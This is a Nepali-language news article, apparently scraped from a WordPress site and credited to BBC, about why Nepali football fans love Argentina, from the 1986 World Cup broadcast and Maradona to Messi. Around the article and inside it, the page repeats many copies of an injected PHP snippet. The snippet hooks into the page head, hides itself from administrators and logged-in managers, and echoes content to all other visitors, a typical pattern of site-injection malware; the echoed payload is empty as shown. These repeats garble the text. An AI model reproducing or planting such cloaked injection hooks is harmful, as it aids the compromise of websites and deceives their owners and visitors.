if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999); if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999); if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999); if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999); if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999); if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999); if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999); if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999); नेपालले किन माया गर्छ आर्जेन्टीनालाई?

सोमबार , जेठ ४, २०८३

if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999);

नेपालले किन माया गर्छ आर्जेन्टीनालाई?

image

“हैट् टेलिभिजनको महत्त्व त त्यतिबेला पो थियो त।”

विषय खोतल्नासाथ मख्खनका ५५ वर्षिय अम्बर स्थापित रोमाञ्चित हुन्छन्।

स्थापितको शान १९८६ को विश्वकप ताका आयोजक बराबर थियो। टेलिभिजन भएको घरका मालिक जो थिए उनी।

उनी सम्झिन्छन् – “पानासोनिक टिभी थियो। घरमा सबै साथीभाइ छिमेकीहरू जम्मा हुन्थे। रातिको फुटबलको अर्कै मज्जा। एउटा खेल र अर्को खेल बिचको समयमा खेलको समिक्षा हुने। बेग्लै थियो नी त्यतिबेलाको माहोल। बिर्सिनै नसकिने।”

हो, त्यही नै बेला हो थुप्रैले आर्जेन्टीना र म्याराडोनाको नाम पहिलो पटक सुनेको र देखेको।

अनि त्यही नै बेला हो म्याराडोनाले जादूमयी प्रदर्शन गरेको, हातले गोल हानेको, फुटबल इतिहासकै उत्कृष्ट गोल गरेको र विश्वकप उपाधि नै जितेको।

नेपाली समर्थकहरूको मनमा म्याराडोनाको प्रदर्शनको त्यो छाप यति भित्रसम्म गढ्यो की आर्जेन्टीनाको त्यो समर्थन यात्रा अहिलेसम्म जारी छ।

संयोग टिभी र विश्वकपको

वास्तवमै १९८६ को विश्वकप फुटबलले नेपाली समर्थकहरूमा अन्तर्राष्ट्रिय फुटबल प्रतिको चाह असाध्य नै बढाइदिएको हो।

संयोग के पनि रह्यो भने विसं २०४२ सालमा नेपाल टेलिभिजनको स्थापना भएपछि  नेपालमा टेलिभिजन युग शुरु भयो।

शुरुमा ब्ल्याक एन्ड ह्वाइट र त्यसपछि रंगिन टेलिभिजन हेर्ने क्रम बढ्न गयो। त्यसकै अर्को वर्ष मेक्सिकोमा विश्वकप फुटबलको आयोजना भयो।

दशरथ रङ्गशालामा मात्र फुटबल हेरिरहेका नेपाली फुटबल समर्थकहरूले टेलिभिजन र विश्वकपको मज्जा एकसाथ लिने अवसर पाए।

त्यसभन्दा अगाडि विश्व फुटबलमा नेपाली समर्थकहरू त्यति भिज्न पाएका थिएनन्।

विदेशी सूचनाको पहुँच पनि निकै सीमित मात्र थियो। खेलकुद बुझ्न भारतबाट आउने पत्रिकाहरू पढेर, भारतीय रेडियोबाट आउने कमेन्ट्री सुनेर, एन्टिना मिलाएर हेर्ने दुरदर्शन जस्ता मिडियामा भर पर्नुपर्ने त्यतिबेलाका खेलाडीहरू सम्झन्छन्।

राष्ट्रिय टोलीका पूर्व खेलाडी भीम थापा सम्झिन्छन् – ” कोलकाताबाट टेलिग्राफ पत्रिका आउँथ्यो। त्यसमा फुटबलको खूब राम्रो विश्लेषणहरू आँउथ्यो। त्यो पढ्थ्यौँ। पेलेको जीवनी नै मगाएर पढेको छु मैले।”

आर्जेन्टीनासँगको साइनो

सन् १९८२ मा आधिकारिक अन्तर्राष्ट्रिय प्रतियोगिता खेलेको भएपनि नेपाली राष्ट्रिय फुटबल टोलीले त्यसअघि नै अन्तर्राष्ट्रिय स्तरमा प्रतियोगिताहरूमा भाग लिन शुरु गरिसकेको देखिन्छ।

त्यसैताका सन् १९७८ मा आर्जेन्टीनाले विश्वकप जित्यो। आर्जेन्टीनाबारे नेपाली खेलाडीहरू त्यो बेला देखि प्रभावित हुन थाले।

सन् १९८२ तिर भारतको दूरदर्शन च्यानलमा अलि अलि अन्तर्राष्ट्रिय फुटबल हेरिन थालियो।  म्याराडोनाको चर्चा चाहिँ त्यही बेला देखि सुनिन थालेको उतिबेलाका खेलाडीहरू बताउँछन्।

स्थापनापछि विश्वकप फुटबल देखाउने नेपाल टेलिभिजनको निर्णय भने विश्व फुटबलमा नेपालीहरूलाई प्रवेश गराउने ‘टर्निङ प्वाइन्ट’ बन्न पुगेको देखिन्छ।

त्यो प्रसारण निकै नै गाह्रो तरिकाले सम्भव भएको त्यतिबेलाका एनटिभीका स्टाफ प्रकाश केसी बताउँछन्।

उनी सम्झिन्छन्- ” भर्खरै स्थापना भएकोले एनटिभीसँग स्याटलाइट लिंक थिएन। त्यो नेपाल टेलिकमसँग थियो। अनि टेलिकमको बलम्बूस्थित अफिसमा गएर विश्वकप टेपमा सार्ने काम हुन्थ्यो। र सारेको टेप सिंहदरबार पठाइन्थ्यो।”

उनी थप्छन् – “हामीले विश्वकप प्रसारण आधा घण्टा ढिलो मात्र शुरु गर्थ्यौं। बलम्बुमा आधा/ आधा घण्टामा टेप सार्ने र एकजना कर्मचारीलाई दौडाउने अनि त्यो आधा घण्टाको खेल सकिनु अगाडि नै अर्को टेप दौडाएर ल्याउथ्यौँ। मज्जाको धपेडी हुन्थ्यो।”

त्यसरी ल्याएको फुटबलको भ्वाइस ओभर गरेका थिए पूर्व राष्ट्रिय खेलाडी कोमल पाण्डे र भीम थापाले।

थापा भन्छन् – ” हामीले सबै खेलाडी कहाँ चिन्थ्यौँ र? जर्सी नम्वर हेरेर कमेन्ट्री गरियो। त्यो अचम्मको अनुभव थियो।”

म्याराडोना नै म्याराडोना

एनटीभीले क्वार्टर फाइनलदेखि फाइनलसम्मको खेल प्रसारण गरेको थियो।

म्याराडोनाको जादू ऐतिहासिक रूपमा चलेको त्यो विश्वकप संस्करणमा नेपालीहरू प्रत्यक्षदर्शी बने।

क्वार्टर फाइनलमा ‘ह्यान्ड अफ गड’ को नामले चर्चित हाते गोल, सेमिफाइनलमा बेल्जियम र फाइनलमा पश्चिम जर्मनीलाई पराजित गरी आर्जेन्टीनाले विश्वकप जित्यो।

त्यो बेला विश्व फुटबलमा छलाउने वा ‘ड्रिबलिङ’ को फेशन थियो। खेलाडी एक्लैले बल लगेर विपक्षी डि बक्समा हमला गर्ने त्यो कलामा म्याराडोना माहिर थिए।

अनि त म्याराडोना र आर्जेन्टीनाको समर्थन नेपालमा छपक्कै बढ्यो।

८६ को त्यो विश्वकपपछि १९९० र १९९४ को विश्वकपमा पनि म्याराडोनाकै छाप थियो।

रोजर मिल्लाको गोलले सन् १९९० को पहिलो खेलमा आर्जेन्टीना क्यामरुनसँग पहिलो खेल हारेपछि म्याराडोना प्रति सहानुभूति जनाउने समर्थक नेपालमा कम्ता थिएनन्।

तर म्याराडोनाले मेहनत गरेर टोलीलाई फाइनलसम्म पुर्‍याएपछि उनको क्रेज झन चुलिएको देखियो। त्यो संस्करणमा क्वार्टर फाइनलमा ब्राजिललाई नै हराउनु आर्जेन्टीनाको अर्को विशेषता रह्यो।

किनकी ब्राजिल र आर्जेन्टीनाका रूपमा नेपाली समर्थकहरू त्यतिबेलासम्म दुई चिरामा विभाजित भइसकेका थिए।

नेपाली समर्थकहरूले त्यतिबेलासम्म अन्तर्राष्ट्रिय क्लब फुटबल पछ्याउन थालिसकेका थिए। म्याराडोनाको इटालियन क्लब नापोलीलाई पनि नेपालीहरूले पछ्याए।

सन् १९९४ को विश्वकपमा म्याराडोना कोकिनको केशमा प्रतिबन्धमा परे। नेपाली समर्थकहरूले उनलाई माफी दिनुपर्ने आवाज उठाए।

फुटबल विश्लेषक सञ्जिव मिश्र भन्छन् – ” सकारात्मक होस् वा नकारात्मक चर्चा चाहिँ म्याराडोना र आर्जेन्टीनाकै भयो। कोकिन काण्ड होस् या अन्य काण्ड, म्याराडोना छाइरहे। नेपालीहरू ले पछ्याई नै रहे।”

म्याराडोना र नेपालको कुरा आएपछि फाकल्याण्ड युद्धको कुरा त जोडिएर आउँछ नै। किनकी यसको सम्बन्ध प्रत्यक्षरूपमा नेपालसँग जोडिने गर्छ।

यसमा धेरै कुरा किम्बदन्ती जस्तै सुनिन्छ, जसको आधिकारिक पुष्टि भएको देखिँदैन।

सन् १९८२ मा फाकल्याण्ड टापुको विषयलाई लिएर इङग्ल्याण्ड र आर्जेन्टीना बिच युद्ध चल्यो। २ महिना लामो चलेको सो युद्ध इङ्ग्ल्याण्डले जित्यो। इङ्ग्ल्याण्डले जित्नुको प्रमुख कारण रह्यो ‘गोर्खा रेजिमेन्ट’ ले देखाएको साहसपूर्ण युद्धकौशल।

त्यो हारका कारण आर्जेन्टीनीहरूले नेपाल र गोर्खा रेजिमेन्टलाई मन पराउँदैन भनिन्छ।

युद्धपछि भएको १९८६ को विश्वकपको क्वार्टर फाइनलमा जब आर्जेन्टीनाले इङ्ग्ल्याण्डलाई म्याराडोनाको हाते गोलको मद्दतले हरायो, म्याराडोनाले भनेका थिए रे – ” धन्न इङ्लिस टोलीमा गोर्खालीहरू थिएनन्।”

यो विषयमा अहिले पनि तर्क वितर्कहरू जारी नै छ।

नेपाल विरुद्ध आर्जेन्टीना

दक्षिण एसियाली राष्ट्र नेपाल र आर्जेन्टीनाबिच कहिले फुटबल मैदानमा प्रतिस्पर्धा भएको छ?

छ, १९८३ मा।

तर त्यो आर्जेन्टीनाको राष्ट्रिय टोली भने थिएन।

मलेसियामा त्यसबेलाको ‘मर्डेका कप’ फुटबल प्रतियोगितामा नेपाली राष्ट्रिय टोली र आर्जेन्टीनाको एउटा क्लबबिच भेट भएको थियो।

उक्त प्रतिस्पर्धामा भाग लिएका राष्ट्रिय टोलीका पूर्वरक्षक श्रीराम रञ्जितकार भन्छन् -“क्लबको नाम पनि बिर्सियो। तर त्यसमा म्याराडोनासँगै खेल्ने राष्ट्रिय टोलीका ३/४ जना खेलाडीहरू थिए। नेपालले खेल ३-० ले हारेको थियो। “

बस इतिहासमा त्यही एक पटक नेपाल र आर्जेन्टीनाबिच फुटबल मैदानमा भेट भएको हो। त्यसपछि अहिलेसम्म त्यस्तो मौका जुरेको छैन।

मनाङ मर्स्याङदी र मणि शाह

नेपालको सफल ए डिभिजन क्लब मध्येको एक मनाङ मर्स्याङदी क्लब पनि आर्जेन्टीनाबाट प्रभावित भयो र उसले आर्जेन्टीनाको जस्तै जर्सी लगायो।

विसं २०४२ सालमा शहिद स्मारक लिगको डि देखि ए डिभिजनसम्मको यात्रामा मनाङले त्यही जर्सी लगाएर खेल्यो।

अहिले त्यो ‘सेतो र हल्का गाढा निलो धर्के जर्सी’ मनाङ मर्स्याङदी क्लबको ब्राण्ड बनिसकेको छ।

मनाङका समर्थकहरू भन्ने गर्छन् “- रङ गाढा भन्दा हल्का राम्रो हो नी। सेतो आकाशे जर्सी  शान्तिको रङ जस्तै लाग्ने।”

त्यही जर्सी लगाएर खेल्ने खेलाडी हुन् स्वर्गिय मणि शाह।

मणि र म्याराडोना उस्तै उस्तै। उचाइ, मोटाइ, कपाल र बाँया खुट्टाले जादू देखाउने शैली ठ्याक्कै उस्तै।

जसरी म्याराडोनाले आर्जेन्टीनामा उसरी नै नेपाली राष्ट्रिय टोलीमा मणि शाहले मुख्य खेलाडीको रूपमा टोली सम्हाले।

त्यसैले उनी ‘नेपालको म्याराडोना’ उपनामले चर्चित भए। आखिर उनले म्याराडोनालाई सम्झाउने काम गरे। आर्जेन्टीनाको समर्थक बढाए।

पुस्ता हस्तान्तरण

विश्व फुटबल मन पराउने नयाँ पुस्ता अहिले युरोपेली लिगमा अभ्यस्त भइसकेका छन् र अब फरक फरक देशलाई समर्थन गर्नेहरूको सङ्ख्या मजाले बढिसकेको छ।

यद्यपि अहिले पनि नेपालमा ब्राजिल र आर्जेन्टीनाकै समर्थकहरू बढी देखिन्छन्।

त्यसको एउटा कारण के हो भने म्याराडोना प्रेरित समर्थक हुँदै अब नेपालले लियोनल मेस्सीलाई उत्तराधिकारीका रूपमा पाएका छन्।

म्याराडोनाको स्थान मेस्सीले लिएका छन् झन जबर्जस्त रुपमा।

मेस्सीले विश्व फुटबलमा झन्डै २ दशक लामो समय प्रभाव जमाउँदा नेपालमा थुप्रै समर्थकहरूको मन जितेका छन्।

मेस्सी पछि अब को? यो प्रश्न अब आगामी दिनहरूमा उठ्न सक्ला। तर एउटा कुरा प्रस्ट छ आर्जेन्टीनालाई माया गर्ने नेपाली समर्थकहरू तुरुन्तै हराउने चाहिँ देखिँदैन।

गजबको कुरा के मात्र हो भने आर्जेन्टीनालाई थाहा छैन की नेपालमा उसका यति धेरै समर्थकहरू छन्, क्लब छ र म्याराडोना जस्तै मणि पनि थिए। (बीबीसीबाट)

सम्बन्धित समाचार

if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999); if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999);